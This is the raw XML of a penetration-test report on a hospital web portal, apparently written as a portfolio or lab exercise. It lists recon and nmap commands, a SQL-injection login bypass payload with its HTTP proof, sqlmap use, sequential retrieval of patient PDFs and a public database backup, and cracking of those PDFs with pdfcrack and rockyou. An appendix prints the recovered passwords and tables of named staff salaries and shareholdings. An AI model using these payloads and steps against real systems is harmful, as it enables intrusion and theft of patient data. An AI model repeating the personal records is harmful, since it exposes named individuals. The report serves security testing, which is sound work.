            <w:tcW w:w="2556"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Observed result</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01</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DNS resolution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dig @1.1.1.1 medirozahospital.com A +short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199.188.201.16</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02</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DNS resolution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dig @8.8.8.8 medirozahospital.com A +short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199.188.201.16</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03</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headers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curl -k -I https://medirozahospital.com/</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HTTP/2 200; Server: LiteSpeed; 5,445-byte HTML response</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04</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Robots policy</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curl -k -sS https://medirozahospital.com/robots.txt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Disallowed /patient/, /staff/, /old/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05</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Sitemap</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curl -k -sS https://medirozahospital.com/sitemap.xml</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pages listed; restricted areas omitted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06</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 login discovery</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curl -k -sS https://medirozahospital.com/patient/login.php</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Login form; POST username/password fields</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07</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WHOIS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whois medirozahospital.com</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NameCheap; created 2026-08-14; privacy protected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08</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Full TCP scan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sudo nmap -Pn -p- --min-rate 1000 199.188.201.16</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First run observed 13 open ports</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09</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Service scan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sudo nmap -Pn -sV -sC -p21,25,53,80,110,143,443,465,587,993,995,2077,2091 199.188.201.16</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FTP/SMTP/DNS/HTTP/IMAP/POP3/cPanel-related services observed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Authentication baseline</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curl -k -sS -o /tmp/a.html -w "status=%{http_code} size=%{size_download} redirect=%{redirect_url}\n" -X POST "https://medirozahospital.com/patient/login.php" --data-urlencode "username=admin" --data-urlencode "password=wrongpassword123"</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200; 2,281 bytes; no redirect</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11</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Manual SQLi/auth bypass</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curl -k -sS -o /tmp/b.html -w "status=%{http_code} size=%{size_download} redirect=%{redirect_url}\n" -X POST "https://medirozahospital.com/patient/login.php" --data-urlencode "username=admin' -- -" --data-urlencode "password=wrongpassword123"</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302; redirect to /patient/portal.php</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12</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Automated SQLi validation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sqlmap -u "https://medirozahospital.com/patient/login.php" --data="username=admin&amp;password=wrongpassword123" -p username --batch --level=1 --risk=1 --threads=1 --timeout=15 --retries=1</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403 responses/connection failures; injection not independently confirmed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13</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 report retrieval</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GET /patient/download.php?id=1</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200; 3,657 bytes; application/pdf</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14</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 report retrieval</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GET /patient/download.php?id=2</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200; 3,611 bytes; application/pdf</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15</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 report retrieval</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GET /patient/download.php?id=3</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HTTP 200; 3,735 bytes; application/pdf</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16</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Public backup retrieval</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curl -k -sS -O "https://medirozahospital.com/old/mediroza_db_backup_2019.sql"</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6.2 KB; 93 lines</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17</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Backup inspection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ls -lah mediroza_db_backup_2019.sql &amp;&amp; wc -l mediroza_db_backup_2019.sql &amp;&amp; head -20 mediroza_db_backup_2019.sql</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Backup header identifies confidential HR/shareholder data</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18</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hash extraction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/usr/share/john/pdf2john.pl patient_report_1.pdf &gt; patient_report_1.hash</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hash extracted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19</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hash extraction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/usr/share/john/pdf2john.pl patient_report_2.pdf &gt; patient_report_2.hash</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hash extracted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20</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hash extraction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/usr/share/john/pdf2john.pl patient_report_3.pdf &gt; patient_report_3.hash</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hash extracted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21</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John the Ripper attempt</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john --format=pdf --wordlist=/usr/share/wordlists/rockyou.txt patient_report_1.hash</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Installed build rejected the supplied PDF hash format</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22</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security inspection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qpdf --show-encryption patient_report_1.pdf</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V=2; R=3; 128-bit; encrypted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23</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integrity validation</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qpdf --check patient_report_1.pdf</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 structural errors after decryption</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24</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password recovery</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pdfcrack -w /usr/share/wordlists/rockyou.txt patient_report_1.pdf</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Password recovered: 123456</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25</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password recovery</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pdfcrack -w /usr/share/wordlists/rockyou.txt patient_report_2.pdf</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Password recovered: password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>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26</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 password recovery</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pdfcrack -w /usr/share/wordlists/rockyou.txt patient_report_3.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2556"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Password recovered: !@#$%^&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Representative HTTP proof</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /patient/login.php HTTP/2</w:t>
        <w:br/>
        <w:t>Host: medirozahospital.com</w:t>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
        <w:br/>
        <w:br/>
        <w:t>username=admin%27+--+-&amp;password=wrongpassword123</w:t>
        <w:br/>
        <w:br/>
        <w:t>HTTP/2 302</w:t>
        <w:br/>
        <w:t>Location: https://medirozahospital.com/patient/portal.php</w:t>
        <w:br/>
        <w:t>Set-Cookie: PHPSESSID=&lt;redacted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>30. Evidence Integrity &amp; Chain of Custody</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The evidence package was organized into numbered domains covering source material, reconnaissance, network scans, web access, SQL injection/Burp evidence, patient reports, password recovery, database exposure, reports and manifests. The original package contained 65 files representing 58 unique SHA-256 content hashes with duplicate-content groups identified in the inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Evidence integrity is important in a penetration test because a finding should remain independently checkable after the live target changes. The captured PDFs, SQL backup, screenshots, command register and SHA-256 inventory therefore form the durable proof layer for the report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>31. Confidential Credential &amp; Sensitive Data Appendix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>RESTRICTED. The following values are included only for the authorized technical record. They must not be placed in a public repository or public portfolio.</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blHeader w:val="true"/>
        </w:trPr>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Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112"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Recovered password</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patient_report_1.pdf</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123456</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patient_report_2.pdf</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password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>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patient_report_3.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5112"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!@#$%^&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Staff dataset — restricted analytical view</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>For data minimization, the narrative uses aggregate statistics. The underlying SQL file remains the authoritative source for the complete staff records, including national identifiers and direct contact data.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="1022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045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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w:t>
            </w:r>
          </w:p>
        </w:tc>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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>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Department</w:t>
            </w:r>
          </w:p>
        </w:tc>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Salary</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Rajesh Naidoo</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Chief Pathologist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Diagnostics Lab</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138,000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Sarah Botha</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Chief Financial Officer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Finance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152,000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Johan van der Merwe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Medical Director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Management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160,000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Anita Naicker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Consultant Cardiologist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Cardiology</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132,000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Ahmed Kara</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Consultant Physician</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Internal Medicine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128,000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6</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Yusuf Cassim</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Senior Registrar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Emergency &amp; Trauma</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74,000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Michael Roberts</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HR Director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Human Resources</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96,000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8</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Susan Pretorius</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HR Officer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Human Resources</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32,000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9</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Jameel Malik</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IT Systems Administrator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58,000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Thabo Molefe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Network Engineer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IT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46,000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11</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Nomvula Khumalo</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Registered Nurse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Emergency &amp; Trauma</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34,000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12</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Lerato Mokoena</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Registered Nurse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Pediatrics</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33,000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13</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Bongani Ndlovu</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Registered Nurse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Cardiology</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35,000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14</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Zanele Mahlangu</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Nursing Sister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Theatre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42,000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15</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Kagiso Sithole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Pharmacist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Pharmacy</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61,000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16</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Naledi Zulu</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Pharmacy Assistant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Pharmacy</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26,000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17</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Themba Nkosi</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Radiographer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Radiology</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44,000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18</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Palesa Radebe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Radiographer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Radiology</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43,000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19</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Deepak Pillay</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Lab Technologist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Diagnostics Lab</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41,000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Kavitha Govender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Lab Technician</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Diagnostics Lab</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35,000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21</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Suresh Moodley</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Consultant Radiologist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Radiology</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130,000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22</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Fatima Patel</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Pediatrician</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Pediatrics</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118,000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23</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Nisha Singh</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Physiotherapist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Rehabilitation</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48,000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24</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Vikram Chetty</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Anaesthetist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Theatre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135,000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25</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David Smith</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Facilities Manager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Operations</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52,000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26</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Karen O'Connor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Billing Administrator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Finance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29,000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27</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James Wilson</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Security Supervisor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Operations</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27,000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28</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Linda Fourie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Receptionist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Front Office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19,000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29</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Peter van Wyk</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Procurement Officer</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Supply Chain</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38,000</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Andile Mbeki</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Ward Clerk</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Administration</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ZAR 21,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Shareholder dataset — restricted</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="1022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045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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w:t>
            </w:r>
          </w:p>
        </w:tc>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Shareholder</w:t>
            </w:r>
          </w:p>
        </w:tc>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Ownership</w:t>
            </w:r>
          </w:p>
        </w:tc>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Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="17365D" w:val="clear"/>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Class</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Rajesh Naidoo</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18.0%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180,000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2</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Cedar Health Holdings (Pty) Ltd</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15.0%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150,000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Johan van der Merwe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12.0%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120,000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Reddy Family Trust</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11.0%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110,000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Thabo Molefe</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10.0%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100,000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6</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Sarah Botha</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9.0%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90,000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Ahmed Kara</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8.0%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80,000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Preferential</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8</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Naledi Zulu</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7.0%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70,000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9</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Michael Roberts</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6.0%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60,000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Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>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10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Dr. Vikram Chetty</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4.0%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40,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="20" w:after="40"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:rFonts w:eastAsia="ＭＳ 明朝" w:cs=""/>
                <w:kern w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="ＭＳ 明朝" w:cs=""/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Preferential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>32. Evidence Gallery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following gallery uses the renamed evidence artifacts included in the project package. Names are intentionally descriptive so a reviewer can map a screenshot to the corresponding finding without opening the file first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="25806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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2580640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>01 Baseline Burp Request — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="30308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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3030855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>02 Baseline Burp Response — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="30308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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3030855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>03 SQLi Test Request — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="18211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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1821180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>04 SQLi Auth Bypass Response — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="1398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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1398905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>05 PDF Hash Extraction — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="29044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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2904490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>06 Public SQL Backup — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="28898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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2889885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>07 Patient Portal Lab Reports — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="28975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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2897505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>08 Patient Report Download Links — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="30308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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3030855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>09 Patient Authentication Bypass — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="24091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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2409190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>10 Old Directory Index — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="29044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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2904490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>11 Patient Directory Index — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5394960" cy="29044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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2904490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
